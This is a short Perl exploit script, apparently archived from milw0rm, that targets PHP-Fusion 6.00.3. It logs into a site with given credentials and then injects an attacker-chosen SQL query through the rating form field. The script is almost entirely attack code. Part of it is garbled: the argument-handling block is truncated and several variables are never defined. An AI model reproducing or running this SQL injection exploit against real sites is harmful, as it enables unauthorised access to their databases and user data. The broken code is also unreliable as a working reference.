#!/usr/bin/perl #Exploit for PHP-Fusion 6.00.3 Released #Coded by:krasza[krasza@gmail.com] #Greetz: http://www.curityreason.com use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; if(!$ARGV[3]){ print<agent("Exploit for PHP-Fusion" . $ua->agent); $ua->cookie_jar( HTTP::Cookies->new( 'file' => 'ciasteczka.txt', 'autosave' => 1,)); print "[+]Connecting to $url...\n"; my $zadanie = new HTTP::Request POST => $url; $zadanie->content_type('application/x-www-form-urlencoded'); $zadanie->content('user_name=' . $login . '&user_pass=' . $haslo . '&login=Loguj' ); my $wynik = $ua->request($zadanie); if ($wynik->is_success){ print "[+]Connected to $url\n"; #LOGIN JEST PRAWIDLOWE }else{ print "[-]Connected failed to $url\n"; print "[-]Error:".$wynik->message."\n"; exit; } print "[+] Logging In $url...\n"; $zadanie = new HTTP::Request POST => $url; $zadanie->content_type('application/x-www-form-urlencoded'); $zadanie->content('rating='.$sql.'&post_rating=Dodaj+ocen%EA'); my $wynik2 = $ua->request($zadanie); if ($wynik2->is_success){ print "[+] Sql query isn't done!\n"; }else{ print "[-]Sql query is done\n"; } # milw0rm.com [2005-12-23]